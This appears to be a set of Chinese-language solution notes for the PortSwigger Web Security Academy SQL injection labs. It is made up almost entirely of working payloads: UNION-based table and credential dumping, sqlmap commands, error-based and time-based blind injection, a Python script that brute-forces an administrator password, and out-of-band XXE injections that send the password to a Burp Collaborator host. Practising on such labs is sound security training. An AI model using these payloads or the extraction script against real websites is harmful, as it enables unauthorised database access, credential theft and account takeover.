lab1
girf’ or 1=1–+
lab2
admin’+or 1=1–+ 万能密码登录
lab3
GET /filter?category=Corporate+gifts’+UNION+SELECT+NULL,NULL+FROM+DUAL–HTTP/2
SELECT version FROM v$instance只返回版本号
SELECT banner FROM v$version,返回所请求的完整版本字符串。
lab4
GET /filter?category=Gifts’+UNION+SELECT+‘abc’,@@version# HTTP/2
select * from v$version
lab5
union+select+table_name,null+from+information_schema.tables--+
union+select+column_name,null+from+information_schema.columns+where+table_name='users_pohpev'--+
union+select+username_kjvmus,password_sasxqt+from+users_pohpev--+
登录即可
lab6
-1'+union+select+'a','b'+from+dual--+
-1'+union+select+table_name,'b'+from+all_tables--+ 所有数据库中的表名
-1'+union+select+column_name,'b'+from+all_tab_columns+where+table_name='USERS_UAZUWQ'--+
-1'+union+select+USERNAME_PFKISR,PASSWORD_SPTVBT+from+USERS_UAZUWQ--+
lab7
-Gifts'+union+select+1,null,null--+
lab8
提示找到一个字段包含’wBC2wi’
经过测试,在2的位置放置字符串
-Lifestyle'+union+select+1,'wBC2wi',null--+
lab9
-Gifts'+union+select+table_name,null+from+information_schema.tables--+
-Gifts'+union+select+column_name,null+from+information_schema.columns+where+table_name='users'--+
#此关有两个显示位,1,2,经过测试,放在2的位置不成功,放在1的位置可以
-Gifts'+union+select+username,password+from+users--+
lab10
-Pets'+union+select+null,table_name+from+information_schema.tables--+
-Pets'+union+select+null,column_name+from+information_schema.columns+where+table_name='users'--+
-Pets'+union+select+null,username||'~'||password+from+users--+
lab11
sqlmap -u "https://0a45008e03f375b780de4e5700250052.web-security-academy.net/filter?category=Gifts" --cookie="TrackingId=4YfDIEEQzb8ONICd" -p "TrackingId" --level 3 -T users --columns
sqlmap -u "https://0a45008e03f375b780de4e5700250052.web-security-academy.net/filter?category=Gifts" --cookie="TrackingId=4YfDIEEQzb8ONICd" -p "TrackingId" --level 3 -T users -C username,password --dump
盲注用sqlmap
lab12
sqlmap -u "https://0a92008a03eaaa32802c6294002c00d7.web-security-academy.net/filter?category=Lifestyle" --cookie="TrackingId=Q3Ng4ep9s0d8oT7l" -p "TrackingId" --level 3 -T users --dump
lab13
'+AND+1%3dCAST((SELECT+username+FROM+users+LIMIT+1)+AS+int)--+
lab14
'||+pg_sleep(10)-- 延时10秒
lab15
在TrackingId参数位置
x'%3bselect+case+when+(1=1)+then+pg_sleep(3)+else+pg_sleep(0)+end--
%3b是;
x'%3bselect+case+when+(1=2)+then+pg_sleep(3)+else+pg_sleep(0)+end--
1=2时没有延时,存在时间盲注
判断用户名是否administrator
x'%3bselect+case+when+(username='administrator'+and+length(password)>1)+then+pg_sleep(3)+else+pg_sleep(0)+end+from+users--
确定密码长度为20位
x'%3bselect+case+when+(username='administrator'+and+length(password)=20)+then+pg_sleep(3)+else+pg_sleep(0)+end+from+users--; session=j8O0Ct59oPsLampGr3alDnDXp38fISe8
因为此关延时成功和不延时的场景回显数据包长度都是5335,没办法根据burp去爆破
使用python脚本去爆破
import requests
import time
lists = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',0,1,2,3,4,5,6,7,8,9]
for p in range(21):
for i in lists:
url = 'https://0a5700cf0388d3dd81e9de2300260078.web-security-academy.net/filter?category=Gifts'
cookie = {
'TrackingId': f"x'%3bselect+case+when+(username='administrator'+and+substring(password,{p},1)=\'{i}\')+then+pg_sleep(5)+else+pg_sleep(0)+end+from+users--"}
# 输出响应内容
start_time = time.time()
response = requests.get(url, cookies=cookie)
end_time = time.time()
delay = end_time - start_time
if delay >=4:
print(f"{i}")
得到密码:nb8n6ob1oodp1rtho04k
lab16
点击复制到剪贴板:vgfhr4me01jj0mmvfk7ls924bvhn5ft4
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//vgfhr4me01jj0mmvfk7ls924bvhn5ft4.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
lab17
复制到剪贴板
payload放到下面payload中
x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.lti74uz4drw9dczlsakb5zfuoludi66v.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
lab18
查询库存抓包
将1 union select null 编码
安装hackvertor插件
选中语句右键扩展hackvertor编码hex-entities
是字符型
1 union select username ||‘~’|| password from users